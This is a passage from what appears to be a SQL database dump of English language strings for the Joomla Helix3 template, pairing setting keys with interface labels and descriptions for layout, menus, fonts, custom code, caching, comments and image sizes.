Color','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4502,'HELIX_LINK_HOVER_COLOR_DESC','Leave this field blank if link hover color is not required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4503,'HELIX_HIDDEN_MOBILE','Hide on Mobile','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4504,'HELIX_HIDDEN_MOBILE_DESC','Enable this option to hide this section for mobile devices.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4505,'HELIX_HIDDEN_TABLET','Hide on Tablet','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4506,'HELIX_HIDDEN_TABLET_DESC','Enable this option to hide this section for Tablets.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4507,'HELIX_HIDDEN_DESKTOP','Hide on Desktop','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4508,'HELIX_HIDDEN_DESKTOP_DESC','Enable this option to hide this section for larger display like desktops or laptops.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4509,'HELIX_PADDING','Padding','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4510,'HELIX_PADDING_DESC','Set all the padding area a the space between the content of the element and its border (Top Right Bottom Left). Negative values are not allowed.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4511,'HELIX_MARGIN','Margin','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4512,'HELIX_MARGIN_DESC','Set the margin for all four sides (Top Right Bottom Left). Negative values are also allowed.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4513,'HELIX_ROW_FULL_WIDTH','Fluid Width','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4514,'HELIX_ROW_FULL_WIDTH_DESC','Enable this option to make this section fluid. Fluid row will help you to publish full width content like google map.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4515,'HELIX_CUSTOM_CLASS','Custom CSS Class','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4516,'HELIX_CUSTOM_CLASS_DESC','If you wish to style particular content element differently, then use this field to add a class name and then refer to it in your css file.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4517,'HELIX_COMPONENT','Make Component Area','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4518,'HELIX_COMPONENT_DESC','Enable this option to make this column as a Component area. If you already selected component area for another column then unselect that one first then select this one. <br><strong>Note:</strong> Joomla message section will also be loaded inside this column.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4519,'HELIX_MODULE_POSITION','Module Position','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4520,'HELIX_MODULE_POSITION_DESC','Select any suitable module position from the list. Do not set one module position to multiple position.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4521,'HELIX_TABLET_LAYOUT','Tablet Layout','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4522,'HELIX_TABLET_LAYOUT_DESC','Set the class of this column for tablets.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4523,'HELIX_MOBILE_LAYOUT','Mobile Layout','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4524,'HELIX_MOBILE_LAYOUT_DESC','Set the class of this column for mobile devices','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4525,'COM_TEMPLATES_MENU_FIELDSET_LABEL','<i class=\'fa fa-list-ul\'></i>Menu','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4526,'HELIX_MEGAMENU','Mega Menu','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4527,'HELIX_MEGAMENU_SELECT','Select Menu','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4528,'HELIX_MEGAMENU_SELECT_DESC','Select menu to display as Main menu','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4529,'HELIX_MENU_TYPE','Menu Type','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4530,'HELIX_MENU_TYPE_DESC','Select a suitable menu type from the list. You need to add module to offcanvas position from the Module Manager.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4531,'HELIX_MEGAMENU_OFFCANVAS','Mega Menu & Off Canvas','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4532,'HELIX_OFFCANVAS','Off Canvas','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4533,'HELIX_MEGAMENU_DROPDOWN_WIDTH','Dropdown Width','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4534,'HELIX_MEGAMENU_DROPDOWN_WIDTH_DESC','Input width of mega menu dropdown.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4535,'HELIX_MENU_DROPDOWN_ANIMATION','Dropdown Animation','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4536,'HELIX_MENU_DROPDOWN_ANIMATION_DESC','Select dropdown menu animation from the list.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4537,'HELIX_NO_ANIMATION','No Animation','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4538,'HELIX_FADE_ANIMATION','Fade','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4539,'HELIX_ZOOM_ANIMATION','Zoom','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4540,'HELIX_FADE_UP_ANIMATION','Fade In Up','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4541,'HELIX_NO_MODULE_OFFCANVAS','Please publish modules in <strong>offcanvas</strong> position.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4542,'COM_TEMPLATES_TYPOGRAPHY_FIELDSET_LABEL','<i class=\'fa fa-font\'></i>Typography','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4543,'HELIX_FONT_FAMILY','Font Family','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4544,'HELIX_FONT_WEIGHT_STYLE','Font Weight & Style','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4545,'HELIX_FONT_SUBSET','Font Subset','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4546,'HELIX_FONT_SIZE','Font Size','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4547,'HELIX_UPDATE_FONTS_LIST','Update Fonts List','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4548,'HELIX_UPDATE_FONTS_LIST_DESC','It allows you to refresh the list of available Google fonts. If there are any new ones, this button allows you to quickly update fonts with just one click, and they will be automatically added in to Helix 3 Framework.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4549,'HELIX_UPDATE_FONTS_CLICK','One Click update','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4550,'HELIX_BODY_FONT','Body Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4551,'HELIX_BODY_FONT_DESC','This google font will be applied on <body> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4552,'HELIX_ENABLE_FONT','Enable','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4553,'HELIX_ENABLE_FONT_DESC','Enable google for this CSS Selector.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4554,'HELIX_SELECT_FONT','Select Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4555,'HELIX_SELECT_FONT_DESC','Set the default font.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4556,'HEADING1_FONT','Heading1 Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4557,'HEADING1_FONT_DESC','This google font will be applied on <h1> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4558,'HEADING2_FONT','Heading2 Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4559,'HEADING2_FONT_DESC','This google font will be applied on <h2> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4560,'HEADING3_FONT','Heading3 Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4561,'HEADING3_FONT_DESC','This google font will be applied on <h3> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4562,'HEADING4_FONT','Heading4 Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4563,'HEADING4_FONT_DESC','This google font will be applied on <h4> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4564,'HEADING5_FONT','Heading5 Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4565,'HEADING5_FONT_DESC','This google font will be applied on <h5> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4566,'HEADING6_FONT','Heading6 Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4567,'HEADING6_FONT_DESC','This google font will be applied on <h6> tag.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4568,'NAVIGATION_FONT','Navigation Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4569,'NAVIGATION_FONT_DESC','This google font will be applied on main navigation.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4570,'CUSTOM_FONT','Custom Font','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4571,'CUSTOM_FONT_DESC','Apply this google font to any custom CSS selector.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4572,'HELIX_FONT_CUSTOM_SELECTORS','CSS Selectors','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4573,'HELIX_FONT_CUSTOM_SELECTORS_DESC','Add custom CSS selectors. Separated by comma.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4574,'COM_TEMPLATES_CUSTOM_CODE_FIELDSET_LABEL','<i class=\'fa fa-code\'></i>Custom Code','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4575,'HELIX_CUSTOM_CODE','Custom Code','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4576,'HELIX_BEFORE_HEAD','Before </head>','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4577,'HELIX_BEFORE_HEAD_DESC','Any code you place here will appear in the head section of every page of your site. This is useful when you need to add verification code, javascript or css links to all pages.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4578,'HELIX_BEFORE_BODY','Before </body>','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4579,'HELIX_BEFORE_BODY_DESC','Any code you place here will appear in bottom of body section of all pages of your site. This is useful if you need to input a tracking code for a state counter such as Google Analytics or Clicky.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4580,'HELIX_CUSTOM_CSS','Custom CSS','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4581,'HELIX_CUSTOM_CSS_DESC','You can use custom CSS to add your own styles or overwrite default CSS of a template or extension. This option is good small changes in the stylesheets. For more extensive changes (more then 10 lines of code) we suggest to use the custom.css file.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4582,'HELIX_CUSTOM_JS','Custom Javascript','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4583,'HELIX_CUSTOM_JS_DESC','You can add custom javascripts code. It loads your custom Javascript file after all other Javascript files (except special hard coded occasions), allowing you to be the last one who will affect your website.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4584,'COM_TEMPLATES_ADVANCE_FIELDSET_LABEL','<i class=\'fa fa-cog\'></i>Advanced','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4585,'HELIX_CACHE_SETTINGS','Cache Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4586,'HELIX_CSS_COMPRESS','Compress CSS','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4587,'HELIX_CSS_COMPRESS_DESC','','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4588,'HELIX_JS_COMPRESS','Compress Javascripts','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4589,'HELIX_EXCLUDE_JS','Exclude Javascript','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4590,'HELIX_EXCLUDE_JS_DESC','Enter the names of javascript files seperated by comma that you don\'t want to compress. e.g. jquery.min.js, main.js','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4591,'HELIX_LESS','Less','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4592,'HELIX_ENABLE_LESS','Compile LESS to CSS','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4593,'HELIX_ENABLE_LESS_DESC','Helix 3 is developed with LESS. When customize your site, we suggest you to work with LESS files. All your changes in the LESS files will be compiled into the final CSS files. It will override previus changes.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4594,'HELIX_IMPORT_EXPORT','Export/Import Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4595,'HELIX_IMPORT_EXPORT_FIELD','Settings Import/Export','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4596,'HELIX_SETTINGS_EXPORT','Export Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4597,'HELIX_SETTINGS_IMPORT','Import Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4598,'COM_TEMPLATES_BLOG_FIELDSET_LABEL','<i class=\'fa fa-thumb-tack\'></i>Blog','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4599,'HELIX_COMMENTS','Comments Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4600,'HELIX_COMMENTING_ENGINE','Commenting Engine','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4601,'HELIX_COMMENTING_ENGINE_DESC','Choose which commenting engine will be used for blog post. Select disable in order to hide comments from joomla article.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4602,'HELIX_DISQUSS','Disqus','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4603,'HELIX_INTENSEDEBATE','IntenseDebate','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4604,'HELIX_FB','Facebook','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4605,'HELIX_DISABLED','Disabled','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4606,'HELIX_DISQUS_SUBDOMAIN','Disqus Username/Subdomain','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4607,'HELIX_DISQUS_SUBDOMAIN_DESC','Set the subdomain that you registered at disqus.com','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4608,'HELIX_DISQUS_DEV_MODE','Disqus Developer Mode','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4609,'HELIX_DISQUS_DEV_MODE_DESC','Enable this option if you are testing behind a firewall or proxy, and not yet on your live site.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4610,'HELIX_INTENSEDEBATE_ACC','IntenseDebate Account','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4611,'HELIX_INTENSEDEBATE_ACC_DESC','Set the intenseDebate account','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4612,'HELIX_FB_ID','Facebook Application ID','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4613,'HELIX_FB_ID_DESC','Set the Facebook Application ID, visit https://developers.facebook.com/apps to get application id','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4614,'HELIX_FB_COMMENTS_WIDTH','Comments Width','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4615,'HELIX_FB_COMMENTS_WIDTH_DESC','Width of the comments plugin in pixel, eg. 500. Note: Facebook doesn\'t provide a Facebook Comment code for responsive (fluid grid) websites. It uses only static width for comments box.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4616,'HELIX_FB_COMMENTS_PER_PAGE','Comments Per Page','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4617,'HELIX_FB_COMMENTS_PER_PAGE_DESC','Set the number of comments to displayed per page','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4618,'HELIX_COMMENTS_COUNT','Comments Count','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4619,'HELIX_COMMENTS_COUNT_DESC','Show comments count on blog view or frontpage','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4620,'HELIX_SOCIAL_SHARE','Social Share','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4621,'HELIX_ENABLE_SOCIAL_SHARE','Enable Social Share','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4622,'HELIX_ENABLE_SOCIAL_SHARE_DESC','Enable this option to social share buttons in joomla blog list or single article.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4623,'HELIX_POST_FORMAT','Post Format','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4624,'HELIX_SHOW_POST_FORMAT','Show Icon','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4625,'HELIX_SHOW_POST_FORMAT_DESC','Enable this to show post format icon.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4626,'HELIX3_ARTICLE_RATING','Rating','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4627,'HELIX_IMAGE_SIZES','Image Sizes','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4628,'HELIX_IMAGE_SMALL','Enable Small Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4629,'HELIX_IMAGE_SMALL_DESC','Enable small size image feature. Disable if not required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4630,'HELIX_IMAGE_SMALL_SIZE','Small Image Size','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4631,'HELIX_IMAGE_SMALL_SIZE_DESC','Set the small image size in pixels. e.g 100X100','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4632,'HELIX_IMAGE_THUMBNAIL','Enable Thumbnail Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4633,'HELIX_IMAGE_THUMBNAIL_DESC','Enable image thumbnail feature. Disable if not required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4634,'HELIX_IMAGE_THUMBNAIL_SIZE','Thumbnail Image Size','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4635,'HELIX_IMAGE_THUMBNAIL_SIZE_DESC','Set the thumbnail image size in pixels. e.g 200X200','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4636,'HELIX_IMAGE_MEDIUM','Enable Medium Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4637,'HELIX_IMAGE_MEDIUM_DESC','Enable medium size image feature. Disable if not required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4638,'HELIX_IMAGE_MEDIUM_SIZE','Medium Image Size','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4639,'HELIX_IMAGE_MEDIUM_SIZE_DESC','Set the medium image size in pixels. e.g 300X300','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4640,'HELIX_IMAGE_LARGE','Enable Large Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4641,'HELIX_IMAGE_LARGE_DESC','Enable large size image feature. Disable if not required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4642,'HELIX_IMAGE_LARGE_SIZE','Large Image Size','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4643,'HELIX_IMAGE_LARGE_SIZE_DESC','Set the large image size in pixels. e.g 600X600','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4644,'HELIX_BLOG_LIST_IMAGE','Blog List Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4645,'HELIX_BLOG_LIST_IMAGE_DESC','Select an image size for blog list. By default if a featured image will be shown if available.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4646,'HELIX_BLOG_LIST_IMAGE_DEFAULT','Default','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4647,'HELIX_BLOG_LIST_IMAGE_SMALL','Small','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4648,'HELIX_BLOG_LIST_IMAGE_THUMBNAIL','Thumbnail','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4649,'HELIX_BLOG_LIST_IMAGE_MEDIUM','Medium','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4650,'HELIX_BLOG_LIST_IMAGE_LARGE','large','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4651,'COM_TEMPLATES_LICENSEUPDATE_FIELDSET_LABEL','<i class=\'fa fa-refresh\'></i> Update Settings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4652,'HELIX3_JOOMSHAPER_EMAIL','Email Address','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4653,'HELIX3_JOOMSHAPER_EMAIL_DESC','Enter your JoomShaper user account email address.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4654,'HELIX3_JOOMSHAPER_LICENSE_KEY','License Key','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4655,'HELIX3_JOOMSHAPER_LICENSE_KEY_DESC','Enter your subscription license key. You can get the license key your JoomShaper account dashboard.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4656,'COM_TEMPLATES_MENUS_ASSIGNMENT','<i class=\'fa fa-check-square-o\'></i>Assignment','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4657,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT','Image Content','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4658,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_DESC','Addon to add image and content together.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4659,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE','Addon Title','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4660,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE_DESC','Enter the title to the content block. Leave blank if no title is required.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4661,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT','Content','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4662,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT_DESC','Enter texts for the content block.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4663,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE','Image','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4664,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_WIDTH','Width of the image section','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4665,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_WIDTH_DESC','Set the width of the image section without % sign. eg. 50','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4666,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT','Image Position','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4667,'COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT_DESC','Set image section position to left or right.','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4668,'HELIX_MONTH','Month','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4669,'HELIX_MONTHS','Months','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4670,'HELIX_DAY','Day','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4671,'HELIX_DAYS','Days','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4672,'HELIX_HOUR','Hour','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4673,'HELIX_HOURS','Hours','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4674,'HELIX_MINUTE','Minute','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4675,'HELIX_MINUTES','Minutes','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4676,'HELIX_SECOND','Second','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4677,'HELIX_SECONDS','Seconds','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4678,'HELIX_GO_BACK','Go Back 